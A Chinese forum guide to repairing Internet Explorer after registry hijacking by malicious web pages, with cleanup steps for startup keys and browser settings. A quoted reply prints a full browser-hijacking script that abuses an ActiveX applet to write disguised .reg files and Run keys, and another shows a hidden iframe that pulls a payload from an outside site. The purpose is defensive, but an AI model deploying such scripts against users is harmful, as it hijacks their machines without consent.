恶意代码全攻略－－终结篇
整理:CyberSpy
Email:duguqiuai1357@163.com
QQ:18988418
欢迎访问：www.20cn.net   #20cn网络安全小组#
（注：此为菜鸟专为菜鸟整理，高手就不用浪费时间了，主要是技术性太差）
  计算机系统安全和网络安全在信息技术飞速发达的今天，应该得到应有的重视！然而很多人对此还没有警觉，虽然时不时遭遇 @#!^&*$%：病毒，木马，蠕虫，恶意小程式；操作系统漏洞，ie漏洞，iis漏洞，Unicode漏洞；缓冲区溢出…………反正如此种种，乱！而近来，当大家上网浪得正欢酣的时候，恶意代码又闯进了大家的视线，（其实恶意代码的历史比电子邮件病毒还长）所谓的“网页病毒”、“网页黑手”到底是怎么回事呢？

  不知道您有没有过这样的经历：当你上了一个网站之后，发现IE标题栏、IE起始主页被修改了，或者变灰不让修改IE、地址栏下多出了文字、每次开机出现莫名其妙的提示框、修改输入法、启动项，启动无关程序、菜单被加上了他的脚印、不定时弹出ie页面，弹出无数窗口耗尽系统资源死机、注册表编辑器regedit不能使用、DOS程序不能运行，无法进入系统实模式………下载木马安装给你（ie 5.0以上没有这个漏洞了），网页内嵌病毒，甚至对你的硬盘del *.*,format，deltree呵呵！总之，系统被改得一塌糊涂，惨不忍睹。（以前很出名的“混客绝情炸弹”相信大家还记得吧！）

  造成ie被恶意修改的原因是什么呢？怎么防范呢？
罪魁祸首：当然是……Microsoft，呵呵，主要是ie的执行脚本的一些漏洞啦，通过利用ActiveX修改注册表重要项达到破坏目的。至于Applet、ActiveX及java和vb脚本语言，就请有兴趣的朋友自己去了解了解了（主要是通过本地机上的WSH解析并在本地机上执行代码或者激活应用程序）。幸好现在的杀毒软件都增加了放恶意代码的功能。

  阻止恶意代码修改注册表：
1、大部分的恶意代码只对IE5.0版本有效，所以将IE升级到6.0，并及时下载打上补丁！ 下载安装微软WSH最新版，好像是5.6版！
2、安装最新的杀毒软件，打开实时监控保护上网安全，因为可以阻挡此类大部分恶意代码！
3、警惕性好一点，不要受不良诱惑，尽量不要上你不知道或者不熟悉的网站！（近来的“网页贺卡”也可能是一种传播途径哦）！
4、设置ie安全级别，不推荐，因为这样有点因噎废食，鸵鸟政策的感觉！
5、禁止编辑注册表，win2000用禁止远程编辑注册表！
6、下载优化大师、超级兔子魔法设置、金山注册表恢复器、"魔法石"网页（由3721提供，"魔法石"http://magic.3721.com/网页可以在线清除恶意代码、优化网络、方便地进行个性化设置等）等恢复IE设置！
7、屏蔽一些网站:IE浏览器，选择选单栏里的“工具”→“Internet选项”→“内容”→“分级审查”，点击“启用”按钮，在弹出的“分级审查”对话框中切换到“许可站点”标签，输入您想屏蔽的网站网址，随后点击“从不”按钮，再点“确定”即可!

 注册表被修改的原因及手工修改解决办法：
1、IE默认连接首页被修改 
受到更改的注册表项目为： 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page 
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page 
通过修改“Start Page”的键值，来达到修改浏览者IE默认连接首页的目的，如浏览“万花谷”就会将你的IE默认连接首页修改为“http://on888.home.chinaren.com ”，即便是出于给自己的主页做广告的目的，也显得太霸道了一些，这也是这类网页惹人厌恶的原因。 
解决办法： 
在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键； 展开注册表到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值“Start Page”双击 ，将Start Page的键值改为“about:blank”即可；同理，展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 
在右半部分窗口中找到串值“Start Page”，然后按②中所述方法处理。 
退出注册表编辑器，重新启动计算机，一切OK了！ 
特殊例子：当IE的起始页变成了某些网址后，就算你通过选项设置修改好了，重启以后又会变成他们的网址。其实他们是在你机器里加了一个自运行程序，它会在系统启动时将你的IE起始页设成他们的网站。 
解决办法： 
运行注册表编辑器regedit.exe，然后依次展开 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run主键，然后将其下的registry.exe子键删除，然后删除自运行程序c:\Program Files\registry.exe，最后从IE选项中重新设置起始页就好了。
2、篡改IE的默认页 
有些IE被改了起始页后，即使设置了“使用默认页”仍然无效，这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改： 
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL“Default_Page_URL”这个子键的键值即起始页的默认页。 
 解决办法： 
 运行注册表编辑器，然后展开上述子键，将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了，或者设置为IE的默认值。
3、修改IE浏览器缺省主页，并且锁定设置项，禁止用户更改回来。 
主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选)： 
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Pan 
el]"Settings"=dword:1 
[HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Control Panel]"Links"=dword:1 
[HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Control Panel]"SecAddSites"=dword:1 
解决办法： 
将上面这些DWORD值改为“0”即可恢复功能。 
4、IE的默认首页灰色按扭不可选 
这是由于注册表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”，被修改为“ 1”（即为灰色不可选状态）。 
 解决办法： 
将“homepage”的键值改为“0”或者删除这个项即可。 
5、IE标题栏被修改 
在系统默认状态下，是由应用程序本身来提供标题栏的信息，但也允许用户自行在上述注册表项目中填加信息，而一些恶意的网站正是利用了这一点来得逞的：它们将串值Window Title下的键值改为其网站名或更多的广告信息，从而达到改变浏览者IE标题栏的目的。 
具体说来受到更改的注册表项目为：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title 
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title 
解决办法： 
在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；展开注册表到 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值“Window Title“，将该串值删除即可，或将Window Title的键值改为“IE浏览器”等你喜欢的名字； 同理，展开注册表到 
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main然后按②中所述方法处理。 
退出注册表编辑器，重新启动计算机，运行IE，你会发现困扰你的问题解决了！ 
6、IE右键菜单被修改 
受到修改的注册表项目为： 
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt下被新建了网页的广告信息，并由此在IE右键菜单中出现！ 
解决办法：打开注册标编辑器，找到 
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt 
删除相关的广告条文即可，注意不要把下载软件FlashGet和Netants也删除掉啊，这两个可是“正常”的呀，除非你不想在IE的右键菜单中见到它们。
7、IE默认搜索引擎被修改 
在IE浏览器的工具栏中有一个搜索引擎的工具按钮，可以实现网络搜索，被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改： 
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch 
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant 
解决办法： 
运行注册表编辑器，依次展开上述子键，将“CustomizeSearch”和“SearchAssis 
tant”的键值改为某个搜索引擎的网址即可。 
8、系统启动时弹出对话框 
受到更改的注册表项目为： 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon 在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”，其中“LegalNoticeCaption”是提示框的标题，“LegalNoticeText”是提示框的文本内容。由于它们的存在，就使得我们每次登陆到Windwos桌面前都出现一个提示窗口，显示那些网页的广告信息！ 
解决办法： 
打开注册表编辑器，找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon 这一个主键，然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeTex t”这两个字符串，删除这两个字符串就可以解决在登陆时出现提示框的现象了。 
9、浏览网页注册表被禁用 
这是由于注册表 
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 
下的DWORD值“DisableRegistryTools”被修改为“1”的缘故，将其键值恢复为“ 0”即可恢复注册表的使用。 当运行regedit时，警告框显示：注册表编辑器已被管理锁定
解决方法：打开记事本，严格按照以下格式编辑：
REGEDIT4 (XP或者2000用户这里改为：Windows Registry Editor Version 5.00)
（这里一定空行）
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 
]
“DisableRegistryTools”=dword:00000000 
10、鼠标右键失效 
浏览网页后在IE中鼠标右键失效，点击右键没有任何反应！不能在桌面，驱动器，文件夹，浏览器等地方使用鼠标右键
解决方案：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下
在右边的窗口中删除“NoViewContextMenu”或者改成把1改成0 
11、查看““源文件”菜单被禁用 
在IE窗口中点击“查看”→“源文件”，发现“源文件”菜单已经被禁用。 
具体的位置为：
在注册表HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
下建立子键“Restrictions”，然后在“Restrictions”下面建立两个DWORD值：“ 
NoViewSource”和“NoBrowserContextMenu”，并为这两个DWORD值赋值为“1”。 
在注册表 
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restric 
tions下，将两个DWORD值：“NoViewSource”和“NoBrowserContextMenu”的键值都改为了“1”第2点中提到的注册表其实相当于第1点中提到的注册表的分支，修改第1点中所说的注册表键值，第2点中注册表键值随之改变。 
解决办法： 
删掉以上键或者改dword值为0
12、解开IE工具internet选项
症状:IE浏览器上的工具-internet选项"变成灰色,不能点击
注册表键值:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions
NoBrowserOptions为1即禁用,为0为开启
13、删除文件属性中日期后的网址
文件属性里面的创建时间，修改日期，访问时间都被添加广告
[HKEY_CURRENT_USER\Control Panel\International]
"sLongDate"="yyyy''年''M''月''d''日''
上面是系统默认的键值,如果广告一般是在日后面加字
14、定时弹出网页的解决方法
定时弹出网页的解决方法
解决方法：（这两种方法都是可行的）
 1、 开始-运行-(输入)msconfig-启动-把里面有*.hta,的去掉。Tha的特性就是隐藏掉窗体,然后一段时间就弹出网页
 2、 开始-运行-(输入)regedit找到下面的键值：[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] （这里是最关键的地方）
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices找到后删除方法一中所述内容。对于WINODWS98或WINME的用户以上两种方法均可，推荐用第一种。对于WIN2000用户， 可使用方法二。
15、开机弹出网页的解决方法
开机弹出网页的解决方法
解决方法：（这两种方法都是可行的）
 1、 开始-运行-(输入)msconfig-启动-把里面有网址类的（比如：www.cnoicq.com）,后缀为url的,html的,htm的都勾掉。如果有类似regedit /s ***的也去掉，它的作用是每次都改注册表。
 2、 开始-运行-(输入)regedit找到下面的键值：[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] （这里是最关键的地方）
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices找到后删除方法一中所述内容。
16、删除工具菜单中的网址
删除IE工具栏里面的图标广告,还有上面工具下拉菜单的广告
删除：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions下的键值即可。
17、时间前面被加上站点广告
时间前面被加上站点广告。
恢复方法：改为系统默认值
[HKEY_CURRENT_USER\Control Panel\International]
"StimeFormat"="hh:mm"
18、IE浏览器里面的链接被改成站点广告
IE浏览器里面的链接被改成站点广告.
修改方法：
注册表键值:[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]
"LinksFolderName"="链接"
19、IE右下角那个地球的旁边被添加广告（时间的上面）这个很特别！很难遇到，但遇到了你找都找不到！
找到[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]下"DisplayName"="喜欢什么就改什么!"
20、禁止下载
注册表:HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1803
键值为3即禁止下载,为0是允许下载
21、浏览网页开始菜单被修改 
这是最“狠”的一种，让浏览者有生不如死的感觉。浏览后不仅有类似上面所说的 
那些症状，还会有以下更悲惨的遭遇： 
 1)禁止“关闭系统” 
 2)禁止“运行” 
 3)禁止“注销” 
 4)隐藏C盘――你的C盘找不到了！ 
 5)禁止使用注册表编辑器regedit 
 6)禁止使用DOS程序 
 7)使系统无法进入“实模式” 
 8)禁止运行任何程序 
 恢复隐藏的硬盘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives 键值删除即可
由于HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer 中新建三个 "DWORD" 值，名称分别为 "NoRun"(屏蔽"运行")、"NoFind"(屏蔽"查找")、"NoClose"(屏蔽"关闭系统")，其值均为 "1" ，重启系统后执行 "运行" 与 "关闭系统" 命令时提示操作受限制而取消，同时你会发现 "开始" 菜单中的 "查找" 选项没有了，要重新恢复其设置，可将对应的键删除或将键值置 "0" 即可。 这里实在修改得太多了，如果你不熟悉注册表，我希望你还是重装系统或者找注册表高手。 

PS：其实一般修改这个就是注意找到网站名字，在注册表中查找，然后根据注册表常识，手动进行修改，一般就可以搞定了！


 时间有限，错误在所难免，建议复制，粘贴，保存，以防不时之需。

引用:

---

作者: CyberSpy [cyberspy]
关于“qq自动回复加上小尾巴的解决方案！！”

  近来众多网友反映qq回复时自动被加上了一些小尾巴，甚是烦人。究其原因：网页恶意代码。一些网站为了达到宣传自己、盗取qq等密码等等的可恶目的，太阴毒了！真心希望他们的无耻行为受到法律的制裁！（我没有做梦吧~）

  对于http://www.QQ168.net，由于我是ie6.0，所以没有能中招（本想以身试毒，看看个究竟的，但是天妒英才，哎 ~#￥#￥~），因此本文中的情况皆为根据以往经验虚拟出来的，也许会跟您的遭遇有很多出入，但是原理相通，希望能抛砖引玉，大家最后“高高兴兴上20cn来，快快乐乐杀毒去”。另幸好本版先前“马大哈”同志给出了一帖那个恶意网站的一部分vb脚本源代码对于ie恶意修改还是有所了解。

大概病毒行为：
（1）初始状况会在%windir%\system32\或者%\system\目录下生成一些乱七遭八的木马文件！可能是exe、dll为文件后缀。应该是偷qq密码的，已经中招的，请一定注意自己的qq密码哦，最好马上修改。
（2）修改注册表，增加开机启动项目，使木马服务器端一开机就运行
在注册表中添加HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\等以run开头的项目中，内容为：%windir%\system32\具体文件这里说不准！
    可能修改exe文件、txt文件和com文件等的默认打开方式（即文件关联，你一运行exe文件、txt文件或者com文件木马就被执行一次）：将HKEY_CLASSES_ROOT\comfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\txtfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\exefile\shell\open\command的内容修改为%windir%\System32\具体文件这里说不准 %1 %*。
（3）恶意修改ie的一些选项，具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。


手工清除方法：
1、运行注册表编辑器（regedit）。
2、用系统自带的任务管理器或者进程管理软件停掉可疑的进程。
3、修改HKEY_CLASSES_ROOT\comfile\shell\open\command和HKEY_CLASSES_ROOT\exefile\shell\open\command为"%1" %*，删掉HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run等run开头的项，右边可疑项目。或者运行msconfig->启动->去掉可疑项目。
4、删掉%windir%\system32\中上面发现的可疑文件。

  如果您是新手，对自己的行为不是很有信心，清除过程中可以利用一下：超级兔子魔法设置或者windows优化大师等系统工具。

另外:推荐使用http://www.20cn.org/download/Defend/navce8chs.rar 诺顿杀毒软件，可以在线升级病毒库。
请升级ie或者到微软下载补丁

  具体大概QQ情缘音乐世界,http://www.QQ168.net这个可恶的小尾巴中：
c:\windows\system\systel.dll、c:\windows\system.dll （注意路径和文件名）这两个为恶意vbs脚本文件，不是系统动态链接库。他们修改通过恶意修改注册表达到系统启动便自行修改ie项目的目的，可以删除掉。具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。其他的，木马文件在哪里是什么我不清楚，十分十分抱歉！

PS:www.qq168.net一部分修改ie的恶意代码
<html><script language="">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent.class></APPLET>");
function runcmd() 
{ 
a=document.applets[0]; 
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'); 
a.createInstance(); 
Shl=a.GetObject(); 
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}'); 
a.createInstance(); 
fso=a.GetObject(); 
var wf1=fso.CreateTextFile("c:\\windows\\system\\systel.dll",true); 
wf1.writeLine('REGEDIT4');
wf1.WriteBlankLines(1); 
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]'); 
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]'); 
wf1.WriteLine('"Start Page"="regedit -s c:\\windows\\system\\systel.dll"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.Close();

var wf1=fso.CreateTextFile("c:\\windows\\system.dll",true); 
wf1.writeLine('REGEDIT4');
wf1.WriteBlankLines(1); 
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]'); 
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]'); 
wf1.WriteLine('"win"="regedit -s c:\\\\windows\\\\system\\\\systel.dll"');     
wf1.WriteBlankLines(1);
wf1.WriteLine('rcx');
wf1.Close();

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1", "regedit -s c:\\windows\\system.dll");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net"); 
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net");
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\First Home Page", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\☆♀精彩网站♀☆\\", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\�t☆顶级DJ舞曲☆�s\\", "http://www.qq168.net");
} 
setTimeout('runcmd()',1000);
</script>

---

引用:

---

作者: TomyChen [quest]

做的一个分析是从另外一个类似于这种恶意网站上的代码分析而来的
　　<iframe src=http://www.fucking.com/fuckguy/fucking.mht width=0 height=0></iframe>
　　问题就出在这个fucking.mht下。(IE可以将HTML页面，包括内链的图片，保存为单个的mht文件。mht文件遵循MIME标准，包括IE,Outlook在内的许多软件可以直接打开。)由于用了iframe可能是做为隐藏标记（事实上，我没登陆该网站。公司不让上，我只能搞个小软件把代码给down下来的)。这样登陆的时候就会神不知鬼不觉的下载了fucking.mht文件。我把这个mht文件下载后以editplues（或者你可以用notepad打开）。你会发现系统要你下载一个软件。（也许存在IE版本的问题，可能老版本会不提示，或者是下载到本地后才会提示，具体原因这里不做深研了。有兴趣的可以自行研究，到时别忘了把你的成果post一份给我:D）而正是这个.exe程序在你的系统里做乱。至今为止还没有一家防病毒公司给可以清除这一病毒。（估计快了）给大家的建议是将IE升级到6.0。有事没事别到一些乱七八糟的网上跑。再给大家提个醒。类似于什么qq啊什么sex18/16有这类关键字的域名，还是少上为妙。该干嘛的干嘛去，少去一些无聊的网站省点心。好了，我也不知道还有什么要分析的啦。大家将就着防着点吧。公司做了一些限制，分析也不便。
　　
　　鄙视这种卖弄技术的电脑败类！一切的！
　　由于本人实在看不习惯该网站的作风故把该站域名丑化。而且我也不想大家不小心跑到那个该死的站去...

---